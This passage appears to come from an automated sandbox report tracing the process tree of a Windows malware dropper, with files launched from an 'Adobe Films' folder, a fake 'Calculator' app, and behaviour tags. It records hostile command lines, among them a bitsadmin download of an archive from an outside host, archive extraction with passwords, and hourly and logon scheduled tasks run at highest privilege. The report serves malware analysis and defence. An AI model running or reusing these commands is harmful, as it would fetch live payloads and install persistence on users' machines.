- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\yCYU6qOUstYnFfwx6lvQtxly.exe"C:\Users\Admin\Pictures\Adobe Films\yCYU6qOUstYnFfwx6lvQtxly.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\f3ESHOZX_yJCskhbBLnqpeMx.exe"C:\Users\Admin\Pictures\Adobe Films\f3ESHOZX_yJCskhbBLnqpeMx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff9f3afdec0,0x7ff9f3afded0,0x7ff9f3afdee07⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --mojo-platform-channel-handle=1920 /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --mojo-platform-channel-handle=2336 /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1980 /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3052 /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\Pictures\Adobe Films\4f8fGuX7mGm7DDlW8H2XAO5T.exe"C:\Users\Admin\Pictures\Adobe Films\4f8fGuX7mGm7DDlW8H2XAO5T.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-PTM5S.tmp\4f8fGuX7mGm7DDlW8H2XAO5T.tmp"C:\Users\Admin\AppData\Local\Temp\is-PTM5S.tmp\4f8fGuX7mGm7DDlW8H2XAO5T.tmp" /SL5="$30272,506127,422400,C:\Users\Admin\Pictures\Adobe Films\4f8fGuX7mGm7DDlW8H2XAO5T.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-METLB.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-METLB.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\ff-afc52-5b9-a51ad-a5a1a8e0cc8b8\SHaexoshuvysho.exe"C:\Users\Admin\AppData\Local\Temp\ff-afc52-5b9-a51ad-a5a1a8e0cc8b8\SHaexoshuvysho.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e5fd46f8,0x7ff9e5fd4708,0x7ff9e5fd47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:19⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:19⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3080 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e5fd46f8,0x7ff9e5fd4708,0x7ff9e5fd47189⤵
-
C:\Users\Admin\AppData\Local\Temp\26-f72ed-5ab-fec9a-c4f71b439ae50\SHytymuxejo.exe"C:\Users\Admin\AppData\Local\Temp\26-f72ed-5ab-fec9a-c4f71b439ae50\SHytymuxejo.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zjiuthze.rw3\GcleanerEU.exe /eufive & exit8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exeC:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4a2avad0.kwz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe & exit8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exeC:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe"C:\Users\Admin\AppData\Local\Temp\twbmxfj5.4wx\any.exe" -u10⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pfb2bgn1.ixq\gcleaner.exe /mixfive & exit8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qz1emnyk.wu3\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\qz1emnyk.wu3\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\qz1emnyk.wu3\autosubplayer.exe /S9⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVrfDXva0yyyMOk6 -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piU1sZN2lCj49coM -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl3E1.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 154010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files\Windows Media Player\VCHGWOIJAU\foldershare.exe"C:\Program Files\Windows Media Player\VCHGWOIJAU\foldershare.exe" /VERYSILENT7⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Checks processor information in registry
- Creates scheduled task(s)
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\ZNI8bKplPziC7FLEsLZFyzD1.exe"C:\Users\Admin\Pictures\Adobe Films\ZNI8bKplPziC7FLEsLZFyzD1.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\40uba9ALppp3uZizoSponZcR.exe"C:\Users\Admin\Pictures\Adobe Films\40uba9ALppp3uZizoSponZcR.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe"C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0xd4,0x214,0x7ff9f3afdec0,0x7ff9f3afded0,0x7ff9f3afdee05⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c0,0x1c4,0x1c8,0x130,0x1cc,0x7ff70d949e70,0x7ff70d949e80,0x7ff70d949e906⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1708,6743186004894949023,18218038462160121958,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5504_2082571709" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1724 /prefetch:25⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,6743186004894949023,18218038462160121958,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5504_2082571709" --mojo-platform-channel-handle=1772 /prefetch:85⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1816 -ip 18161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2924 -ip 29241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1772 -ip 17721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3152 -ip 31521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2060 -ip 20601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2208 -ip 22081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 428 -ip 4281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5100 -ip 51001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 836 -ip 8361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 6d52b02116cedc57ecfaa504c2afd229 +oSs3/T0h02Xf+XWCTpQJg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4056 -ip 40561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2668 -ip 26681⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
